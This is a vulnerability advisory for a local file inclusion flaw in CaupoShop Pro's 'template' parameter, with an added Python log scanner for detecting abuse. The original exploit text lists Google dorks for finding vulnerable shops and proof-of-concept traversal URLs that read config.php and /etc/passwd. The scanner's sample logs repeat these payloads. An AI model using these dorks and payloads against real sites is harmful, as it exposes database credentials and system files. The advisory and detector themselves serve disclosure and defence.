Vendor: CaupoShop Pro
By: Rami Salama
CVSS: 7.5 (HIGH)
Type: Local File Include
CWE: 98
Product Name: CaupoShop Pro
Affected Version From: 2.x
Affected Version To: 3.7
Patch Exists: NO
Related CWE: N/A
CPE: a:caupo:cauposhop_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability

CaupoShop Pro (2.x/ <= 3.70) is vulnerable to Local File Inclusion, a flaw that allows an attacker to include a local file, usually through a script on the web server. An attacker can exploit it by manipulating the 'template' parameter in a malicious URL request to the vulnerable CaupoShop Pro application. This can allow the attacker to view sensitive files on the web server, such as configuration files containing database usernames and passwords.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated. Additionally, ensure that the web server is configured to deny access to sensitive files.
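Since no patch exists, reviewing web server logs for abuse of the 'template' parameter complements the validation above. The following is an added example, not part of the original advisory or of CaupoShop: it assumes combined-format access logs and that legitimate template names are plain identifiers, and the log lines, template name and other action value are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate template names are plain identifiers with no path parts.
SAFE_NAME_RE = re.compile(r'\A[A-Za-z0-9_-]{1,64}\Z')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings cannot hide a path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_template(line):
    """Return the decoded 'template' value if the request is suspect, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query)  # parse_qs already decodes one layer
    if not url.path.endswith("index.php") or "template" not in params.get("action", []):
        return None
    for raw in params.get("template", []):
        value = fully_decode(raw)
        if not SAFE_NAME_RE.match(value):
            return value
    return None

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2011:10:00:01 +0000] "GET /shop/index.php?action=template&template=impressum HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Oct/2011:10:00:07 +0000] "GET /shop/index.php?action=template&template=../../../config.php HTTP/1.1" 200 812',
    '203.0.113.9 - - [28/Oct/2011:10:00:09 +0000] "GET /shop/index.php?action=template&template=%252e%252e%252fconfig.php HTTP/1.1" 200 812',
    '203.0.113.7 - - [28/Oct/2011:10:00:12 +0000] "GET /shop/index.php?action=basket HTTP/1.1" 200 9001',
]

def scan(lines):
    """Map line index to decoded template value for every flagged request."""
    return {i: v for i, line in enumerate(lines) if (v := suspicious_template(line)) is not None}

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG).items():
        print(f"line {index}: template={value!r}")
```

The same identifier pattern can serve as an allow-list check on the server side before any template file is opened.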

Exploit-DB raw data:

CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability
-----------------------------------------------------------------------------------------
# Vuln Software : CaupoShop Pro 2.x
                  CaupoShop Classic 3.01
                  CaupoShop Pro 3.70
# Discovered By : Rami Salama
# Contact :       eng.ramisalama_[at]_gmail_[dot]_com
# Vendor :        http://www.caupo.net
# Greets To :     All my colleagues and friends in MCIT scholarship at Raya Academy
# Dorks :         "powered by CaupoShop"
                  inurl:index.php?action=template&template

# Exploit :       http://127.0.0.1/[CaupoShop]/index.php?action=template&template=[LFI]
# POC :           http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../config.php
                  http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../../../../etc/passwd

#28 October 2011 - Egypt